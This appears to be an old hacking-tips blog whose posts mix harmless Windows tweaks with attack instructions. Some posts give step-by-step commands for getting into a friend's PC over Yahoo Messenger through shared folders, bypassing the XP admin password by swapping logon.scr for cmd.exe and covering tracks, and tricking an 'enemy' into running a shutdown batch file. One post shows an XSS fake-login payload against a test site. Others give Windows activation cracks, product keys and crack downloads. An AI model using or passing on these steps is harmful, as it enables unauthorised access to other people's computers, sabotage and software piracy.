Hacking glimpses from dinesh

how to hack my friend pc through yahoo messenger?

2008-07-03T18:07:00.000-07:00

1) Open Command Prompt. Have some one on yahoo messenger send you a file; while the file is sending, in command prompt type -> netstat -an press enter2)it will show alll Active Connections on your computer, in there under foreign ip for a number thats ends in 5050. this is the persons ip adress who is sending you the file3)Now type : net use: h \\ (the person's ip adress)\shareddocs push enter wait for message to show up4)If it is successful you should get a message saying command prompt was successful. If you get a error message than your attempt has failed, probably because the person has security measures in place to prevent hacking.5)if you get the message that says command was successful, than go to my computer. There you will see a file named "shareddocs on (the name of your computer)" open this fileyou are now connected to that person's computer

Receive your orkut scraps on mobile

2008-05-12T12:21:00.000-07:00

This article provides you with a very simple method to get orkut scraps delivered directly into your mobile phone as sms messages. The pages you may subscribe are scrapbook, community pages or even community messages. All the messages will be delivered free of cost. Following are the steps to get any orkut page as sms to mobile :
1. Register your mobile phone to MyToday. MyToday supports almost all networks in India.
2. Login to your orkut account and navigate to the page to which you wish to subscribe.
3. Copy the URL of the above page. It should be copied completely including http://. URL can be found in the address bar (where you enter www.orkut.com) of your browser.
4. In other window/ tab, open the orkutfeeds site and in the field provided, paste the above orkut URL and click on subscribe.

5. Now, copy the URL of subscription page as said above.

6. Open your MyToday account, and navigate to a page as seen in the snap in the following way: a. Under My tab, click on feeds.

b. Under My Folders, click on Manage feeds.

c. Under Folders tab, click on SMS.

d. You will now get into a page.

7. Enter the name as you wish. Say, “My scraps” and at the URL field, paste the URL which you have copied from orkutfeeds subscription page, check Send SMS, click Create.

8. You’re done! Now, you can expect your scraps delivered into your mobile phone as and when your scrapbook updates.

You may use following methods to get your scrap directed to your mobile phone.
1. Determine your cell phone’s email id and use RSSFWD to send scrapbook feed updates to your mobile phone. Easiest way to determine your mobile phone’s email id is to send an email from your cell phone to your mail id (it costs you ) and look for from address in mail. In RSSFWD, you need to enter your cell phone’s mail id instead of your email id.
2. Yahoo! Alerts:
This is quite simple, you need to register your mobile for Yahoo! Mobile or Yahoo! Messenger. Goto Yahoo! Alerts page for feeds. Enter the feed url for your orkut scrapbook and select your mobile device to receive alerts. This trick did not work for me when I used my messenger phone (Spice, Karnataka, India.) to receive alerts. My network is compatible with messenger but did not work for alerts. For detailed description of using Yahoo! Alerts, I recommend you reading this post.
3. We have few more sites like SendMeRss or MyToday(India) or any other applicable for your geographic location. Just use the same trick, use the feed generated by orkut feeds and subscribe to that using any services like the ones above mentioned. Or use your cell phone’s email address and signup for that mail notification.

2008-02-28T03:55:00.000-08:00

Cross Site Scripting (XSS) – The Underestimated Exploit

2008-02-24T02:19:00.000-08:00

1. What is Cross Site Scripting?

Cross Site Scripting (or XSS) is one of the most common application-layer web attacks. XSS commonly targets scripts embedded in a page which are executed on the client-side (in the user’s web browser) rather than on the server-side. XSS in itself is a threat which is brought about by the internet security weaknesses of client-side scripting languages, with HTML and JavaScript (others being VBScript, ActiveX, HTML, or Flash) as the prime culprits for this exploit. The concept of XSS is to manipulate client-side scripts of a web application to execute in the manner desired by the malicious user. Such a manipulation can embed a script in a page which can be executed every time the page is loaded, or whenever an associated event is performed.

A basic example of XSS is when a malicious user injects a script in a legitimate shopping site URL which in turn redirects a user to a fake but identical page. The malicious page would run a script to capture the cookie of the user browsing the shopping site, and that cookie gets sent to the malicious user who can now hijack the legitimate user’s session. Although no real hack has been performed against the shopping site, XSS has still exploited a scripting weakness in the page to snare a user and take command of his session. A trick which often is used to make malicious URLs less obvious is to have the XSS part of the URL encoded in HEX (or other encoding methods). This will look harmless to the user who recognizes the URL he is familiar with, and simply disregards and following ‘tricked’ code which would be encoded and therefore inconspicuous.

2. Site owners are always confident, but so are hackers!

Without going into complicated technical details, one must be aware of the various cases which have shown that XSS can have serious consequences when exploited on a vulnerable web application. Many site owners dismiss XSS on the grounds that it cannot be used to steal sensitive data from a back-end database. This is a common mistake because the consequences of XSS against a web application and its customers have been proven to be very serious, both in terms of application functionality and business operation. An online business project cannot afford to lose the trust of its present and future customers simply because nobody has ever stepped forward to prove that their site is really vulnerable to XSS exploits. Ironically, there are stories of site owners who have boldly claimed that XSS is not really a high-risk exploit. This has often resulted in a public challenge which hackers are always itching to accept, with the site owner having to later deal with a defaced application and public embarrassment.

3. The repercussions of XSS

Analysis of different cases which detail XSS exploits teaches us how the constantly changing web technology is nowhere close to making applications more secure. A thorough web search will reveal many stories of large-scale corporation web sites being hacked through XSS exploits, and the reports of such cases always show the same recurring consequences as being of the severe kind.

Exploited XSS is commonly used to achieve the following malicious results:

* Identity theft
* Accessing sensitive or restricted information
* Gaining free access to otherwise paid for content
* Spying on user’s web browsing habits
* Altering browser functionality
* Public defamation of an individual or corporation
* Web application defacement
* Denial of Service attacks

Any site owner with a healthy level of integrity would agree that none of the above can really be considered us frivolous or unimportant impacts on a vulnerable site. Security flaws in high-profile web sites have allowed hackers to obtain credit card details and user information which allowed them to perform transactions in their name. Legitimate users have been frequently tricked into clicking a link which redirects them to a malicious but legitimate-looking page which in turn captures all their details and sends them straight to the hacker. This example might not sound as bad as hacking into a corporate database; however it takes no effort to cause site visitors or customers to lose their trust in the application’s security which in turn can result in liability and loss of business.

4. A practical example of XSS on an Acunetix test site.

The following example is not a hacking tutorial. It is just a basic way to demonstrate how XSS can be used to control and modify the functionality of a web page and to re-design the way the page processes its output. The practical use of the example may be freely debated; however anyone may see the regular reports which describe how advanced XSS is used to achieve very complex results, most commonly without being noticed by the user. I encourage also those individuals with no hacking knowledge to try the following example, I am sure you will find it interesting.

1. Load the following link in your browser: http://testasp.acunetix.com/Search.asp, you will notice that the page is a simple page with an input field for running a search

2. Try to insert the following code into the search field, and notice how a login form will be displayed on the page:

Please login with the form below before proceeding:

Please login with the form below before proceeding:, then simply hit the search button after inserting the code.

Through the XSS flaw on the page, it has been possible to create a FAKE login form which can convince gather a user’s credentials. As seen in step 2, the code contains a section which mentions “destination.asp”. That is where a hacker can decide where the FAKE login form will send the user’s log-in details for them to be retrieved and used maliciously.

A hacker can also inject this code by passing it around via the browser’s address bar as follows:

http://testasp.acunetix.com/Search.asp?tfSearch=%3Cbr%3E%3Cbr%3EPlease+login+with+
the+form+below+before+proceeding%3A%3C form+action%3D%22test.asp%22%3E%3C
table%3E%3Ctr%3E%3Ctd%3ELogin%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput+type%3D
text+ length%3D20+name%3Dlogin%3E%3C%2Ftd%3E%3C%2Ftr%3E%3Ctr%3E%3C
td%3EPassword%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput +type%3Dtext+length%3D20
+name%3Dpassword%3E%3C%2Ftd%3E%3C%2Ftr%3E%3C%2Ftable%3E%3Cinput
+type%3Dsubmit+value %3DLOGIN%3E%3C%2Fform%3E

This will create the same result on the page, showing how XSS can be used in several different ways to achieve the same result. After the hacker retrieves the user’s log-in credentials, he can easily cause the browser to display the search page as it was originally and the user would not even realize that he has just been fooled. This example may also be seen in use in all those spam emails we all receive. It is very common to find an email in your inbox saying how a certain auctioning site suspects that another individual is using your account maliciously, and it then asks you to click a link to validate your identity. This is a similar method which directs the unsuspecting user to a FAKE version of the auctioning site, and captures the user’s log-in credentials to then send them to the hacker.

5. Why wait to be hacked?

The observation which can be made when new stories of the latest hacks are published is that the sites which belong to the large brands and corporations are hacked in exactly the same way as those sites owned by businesses on a much smaller budget. This clearly shows how lack of security is not a matter of resources, but it is directly dependant on the lack of awareness among businesses of all size. Statistically, 42% of web applications which request security audits are vulnerable to XSS, which is clearly the most recurring high-risk exploit among all the applications tested. The effort to raise awareness about how easy it is for an expert hacker to exploit a vulnerable application does not seem to be going too far. It is still very common to see the “We’ll see when I get hacked” mentality still lingering among site owners who finally risk losing a lot of money and also the trust of their customers. Anybody with the interest to research this matter will see how even individuals claiming to be security experts feel comfortable to state that XSS is over-rated and cannot really be used to achieve serious results on a web application. However further research will also prove that statistical figures speak for themselves, and those same statistics keep growing at a rate which will eventually overcast the claims of those incredulous “experts”.

6. Scan your site for XSS with the Free Edition of Acunetix WVS.

Acunetix Web Vulnerability Scanner Free Edition offers the functionality for anyone who wants to test their own application for Cross Site Scripting. Acunetix encourages all site owners and developers to visit http://www.acunetix.com/cross-site-scripting/scanner.htm and to download the Free Edition of Acunetix WVS. This Free Edition will scan any web application for XSS and it will also reveal all the essential information related to it, such as the vulnerability location and remediation techniques. Scanning for XSS is normally a quick exercise (depending on the size of the application) and indeed can surprise all those who really wish to see where their web site stands from a security point of view.

DOWNLOAD YOUR FREE EDITION AND CHECK IF YOUR SITE IS VULNERABLE TO XSS TODAY!

Hack yahoo messenger and google talk to open multiple instances at a time

2008-02-17T10:33:00.000-08:00

HERE’s a simple hack for yahoo messneger and google talk through which u can create multiple instances if in case u need to..

FOR YAHOO MESSENGER

Go to Start -> Run -> Type regedit -> hit enter

Go to HKEY_CURRENT_USER->> Software ->> Yahoo ->> pager ->>Test

Right click on test -> choose new Dword value .

Rename it as Plural.

Double click it -> assign a decimal value of 1.

Close registry -> Restart yahoo messenger.

NOW you can open yahoo messenger N number of times

FOR GOOGLE TALK

Create a shortcut of Google Talk messenger on your desktop or any other location.

Right click on the Google Talk messenger icon and select properties option

Modify target location text by this

“c:\program files\google\google talk\googletalk.exe” /startmenu

to

“c:\program files\google\google talk\googletalk.exe” /nomutex

Click OK

Now you can run multiple instances of google talk .

Access Stored User Names and Passwords with rundll32.exe

2008-02-14T20:08:00.001-08:00

The Stored User Names and Passwords applet lets you assign user names and passwords to use when needing to authenticate yourself to services in domains other than the one you are currently logged into. The normal way of running this applet can be difficult to find quickly, so here is a way to launch it using a desktop shortcut using the rundll32.exe program:

Click on START - RUN and type the following (followed by ENTER):

rundll32.exe keymgr.dll,KRShowKeyMgr

How to hack windows XP admin password

2008-01-16T22:42:00.000-08:00

How to hack windows XP admin password

If you log into a limited account on your target machine and open up a dos promptthen enter this set of commands Exactly:
cd\ {drops to root}
cd\windows\system32 {directs to the system32 dir}
mkdir temphack {creates the folder temphack}
copy logon.scr temphack\logon.scr {backsup logon.scr}
copy cmd.exe temphack\cmd.exe {backsup cmd.exe}
del logon.scr {deletes original logon.scr}
rename cmd.exe logon.scr {renames cmd.exe to logon.scr}
exit {quits dos}
Now what you have just done is told the computer to backup the command programand the screen saver file, then edits the settings so when the machine boots the screen saver you will get an unprotected dos prompt with out logging into XP.
Once this happens if you enter this command
net user password
If the Administrator Account is called dinesh and you want the password blah enter this
net user dinesh blah
and this changes the password on franks machine to blah and your in.
Have fun
p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks

How to crack IE 7 Beta 2

2008-01-01T00:23:00.001-08:00

Microsoft has released final version of Internet Explorer 7, the next generation of web browser with enhanced security and most-want features. Public can download IE7 full version installer via direct download link from Microsoft.
However, when you try to install IE 7, there is a Windows Genuine Advantage WGA validation check for whether genuine Windows installed. If you for any reason failed the genuine Windows test, you can still install Internet Explorer 7, by making your Windows genuine so that everything will be WGA validated positive.
If installation still unable to proceed, IE7 can still be installed by using several method including the previously known patched IECustom.dll method. Download and install (by double click on .reg file contained in the zip file) the WPA registry hack, which modifies among others, the registry key entry of OOBETimer and LastWPAEventLogged at registry branch of HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WPAEvents, that will make your copy of Windows as is genuine and fully passed WPA (Windows Product Activation).
After patching the registry, simply launch of installer of the IE7 to start the setup, by double clicking on the setup file downloaded from Microsoft. The trick works on 32-bit and 64-bit edition of IE7, and will allow users to access Microsoft (Windows) Update too. Else, use the following method.
Download Microsoft Internet Explorer 7.
Uninstall any existing previous version of IE7, including IE 7 RC1 or Beta version. To uninstall Internet Explorer 7 RC1, go to Control Panel -> Add or Remove Programs, and remove “Windows Internet Explorer 7″. If you unable to see the listing of Windows Internet Explorer 7, run the following command to uninstall from Run of Start menu:%windir%\ie7\spuninst\spuninst.exe
To uninstall Internet Exxplorer 7 Beta 3, Beta 2, Beta 2 Preview, or Beta 1, go to Control Panel -> Add or Remove Programs and remove “Internet Explorer 7 Beta 3″, “Internet Explorer 7 Beta 2″, or “Internet Explorer 7 Beta 2 Preview”.
If you unable to see the listing of any version of Internet Explorer 7 in Add or Remove Programs window, select the Show Updates check box at the top of the Add or Remove Programs window, then search for “Internet Explorer 7 Beta 2 Preview” or “Internet Explorer 7 Beta 1″ under the section of Windows XP - Software Updates, and then remove the beta browser by clicking Change/Remove. If you still having problem to uninstall previous version of IE 7, visit IE7 release notes for more specific instructions and guides.

Download the crack for IE7 installer (IE7RC1_WGA_Crack.zip) or crack for IE7 installer (IE7_Final_WGA_Crack.zip) (direct link removed due to complaints from Microsoft) which contains IECustom.dll and Normaliz.dll. It’s the same patched version of IECustom.dll which is used to install IE7 RC1, and still can be used to install IE7 Gold edition to bypass any WGA validation.
Extract the zip file with cracks.
Extract the setup file of IE7 by using WinRAR extraction tool.
Copy the patched iecustom.dll to the Update folder of the extracted IE7 setup file. Overwrite any existing file.
Run update.exe from the Update folder to start the IE7 installation setup. (Do not run iesetup.exe).

At the end of the successful IE7 installation process, you will be asked to restart Windows, DO NOT RESTART Windows now! Click on the box ‘Do not restart now’ and then select the ‘Finish’ button.

Run the update XmlLiteSetup.exe (Hotfix for Windows XP KB915865) to install or actualize the file xmllite.dll, otherwise there may be problems with menubars such as some items are missing or incomplete, or tabs is not working or not appearing.
Run the update NlsDl.exe (Microsoft National Language Support Downlevel APIs).
Run the update IdnDl.exe (Microsoft Internationalized Domain Names Mitigation APIs). This update will also install the normaliz.dll which is absolutely needed for Windows system restart, thus eliminating the need to manually copy the normaliz.dll (so you can ignore normaliz.dll contained in the crack zip file above).
Restart the Windows.
Enjoy Internet Explorer 7.

If you don’t want to run the setup files from step 9 - 11, simply copy the normaliz.dll from crack to /Windows/System32/ folder. This step is important to avoid system giving Normaliz.dll is missing error. If you prefer not to manually copy the normaliz.dll, download this archive (link removed due to Microsoft complaint) which when execute, will unpack the normaliz.dll and automatically copy the dll file to /Windows/System32/ folder. If you have problem such as missing tabs, run XmlLiteSetup.exe from the Update folder.

If you’re having problem with the steps above, try to start with step 9 - 11 first for installation of setup exe before executing update.exe, as suggested by me.
Note: As the iecustom.dll is from the RC1 release version, you may notice the different version number of IE 7 from the final version of 7.0.5730.11 during installation. However, the Internet Explorer 7 will be of valid ver 7.0.5730.11 once installed and viewed from About.

Disclaimer: This article is for informational and educational purpose only. Readers should contact Microsoft if their licensed or OEM software cannot be validated or purchase genuine software.

Task manager is disabled how to enable it?

2007-12-08T11:24:00.002-08:00

your Task manager disabled???

Then find out the solution for enabling it.
Task manager is such an important tool in Windows XP Which describes the functions and applications running on your system which you can’t see.It is also helpful in terminating the process which is not responding. If such an important tool is disabled on your pc, Then don’t get frustrated. Here’s the solution for enabling it.

1. Click “START” button and go to “RUN” and type ‘regedit’

2. Registry window will be opened, Then Go to HKEY_CURRENT_USER-->SOFTWARE-->MICROSOFT-->WINDOWS

-->CURRENT VERSION

3.Create a Key “System”

4.In System, create a new”DWORD”Value: Disable Task Mgr

5.Set the Data value to 0 to enable Task Mangaer.

If you were blocked from accessing the registry at the first point then try this

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0 /f

Sometimes, a virus such Brontok variants could disable your built-in Windows registry editing tool, which is regedit. It might also because of limited account’s level access where you are only a normal user and not an administrator with full access of the system. Now, one simple way to indicate the problem is whenever you are trying to open the regedit program through “run”, you will get the following message:

“Registry Editing Has Been Disabled By Your Administrator”, then better way is to get an efficient anti virus and I suggest antivir.

Bypass WGA validation to make your XP genuine

2007-12-08T11:19:00.001-08:00

Crack your Windows XP with Service Pack 2 Which uses Registration Key

JD3T2-QH36R-X7W2W-7R3XT-DVRPQ

This will allow you to bypass the Microsoft Genuine Validation.

I hope this is the best and genuine way to crack Xp:

1. Click STARTàRUN and type ‘regedit’

2 Registry window will be opened, Then Go to
HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\Windows NT\CurrentVersion\WPAEvents\OOBETimer

...and doubleclick on it. Then change some of the value data to ANYTHING ELSE...delete some, add some letters, I don't care...just change it!

now close out regedit.

3) Go to start > run > "%systemroot%\system32\oobe\msoobe.exe /a" (again, dont type the quotes)

4) the activation screen will come up, click on register over telephone, then click on CHANGE PRODUCT KEY, enter in this key: JG28K-H9Q7X-BH6W4-3PDCQ-6XBFJ.

Now you can download all the updates without activating, and the Genuine Microsoft Validation will **** you No more.

Note: This works better after reformat

Or else do you want to download the crack for XP,XP home,XP 2, Vista..
i am placing it in a zip folder pls download it from the below link

Download Crack

Is it possible to Change "windows" to your name?

2007-12-07T23:22:00.000-08:00

open notepad dump the following lines into it and save it with the name OEMINFO.INI in the c:\windows\system32 directory:

[General]
Manufacturer=Your Name Here
Model=Your Model Here
[Support Information]
Line1=Your Name Here
Line2=Your Address Here
Line3=Your Email Address Here

Save the file, then make a right click on my computer select properties, in the general tab a button will be highlighted (support information) make a click on it, you will be able to see the changes.
Now if you want to display some more information then simply increase the line in the file.
ex: Line4=Your Working Hours Here

Latest trick to lock my computer(pc) so that no one can open.

2007-12-07T13:23:00.000-08:00

lock ur pc.. open notepad copy and paste the script below and save it .VBS extention
This wil create a shortcut.. run(click) it

set WshShell = WScript.CreateObject("WScript.Shell")
set oShellLink = WshShell.CreateShortcut(wshShell.SpecialFolders("D esktop") & "\LockWorkstation.lnk")
oShellLink.TargetPath = "%windir%\system32\rundll32.exe"
oShellLink.Arguments = "user32.dll,LockWorkStation"
oShellLink.Save

Want to Shut down your opponents PC lets try this

2007-12-07T13:18:00.000-08:00

READ IT ok guys EXCELLENT TRICK !!!!!!
with this trick u can make ur OPPONENT'S PC SHUTDOWN.
read CAREFULLLY its very easy and excellent.

SHUTDOWN OPPONENT'S PC FORCEFULLY.

how it runs- you make a shutdown exe and make ur enemy run.

and it happen in 4 EASY STEPS---->>

*************** START ****************

Open Notepad

Write Shutdown-S (SHUTDOWN(SPACEBAR)-S)

Save with name shutdown.bat (BAT STANDS FOR BATCH FILE--NEED NOT TO GET INTO THIS CRAP JUST DO AS I ASK)

Send the save file through yahoo messenger or through mail to your freind .

***************THATS IT FINISHED***************

OK NOW AS SOON AS UR FRIEND OR ENEMY WILL RUN IT HIS PC WILL SHUTDOWN,WITH THE COUNTDOWN STARTING FROM 30 SEC.

Hack your friend PC using yahoo messenger

2007-12-07T13:11:00.000-08:00

1) Open Command Prompt. Have some one on yahoo messenger send you a file; while the file is sending, in command prompt type -> netstat -an press enter

2)it will show all Active Connections on your computer, in there under foreign ip for a number thats ends in 5050. this is the persons ip address who is sending you the file

3)Now type : net use: h \\ (the person's ip address)\shareddocs push enter wait for message to show up

4)If it is successful you should get a message saying command prompt was successful. If you get a error message than your attempt has failed, probably because the person has security measures in place to prevent hacking.

5)if you get the message that says command was successful, than go to my computer. There you will see a file named "shareddocs on (the name of your computer)" open this file

you are now connected to that person's computer

welcome

2007-12-07T12:33:00.000-08:00

hi friends this is my hearty welcome to my blog, here I provide you various hack tips and tricks provided only for the ethical purposes. If anyone had misused the content provided the author is not at all responsible for the results.... just enjoy hacking

Login:
Password: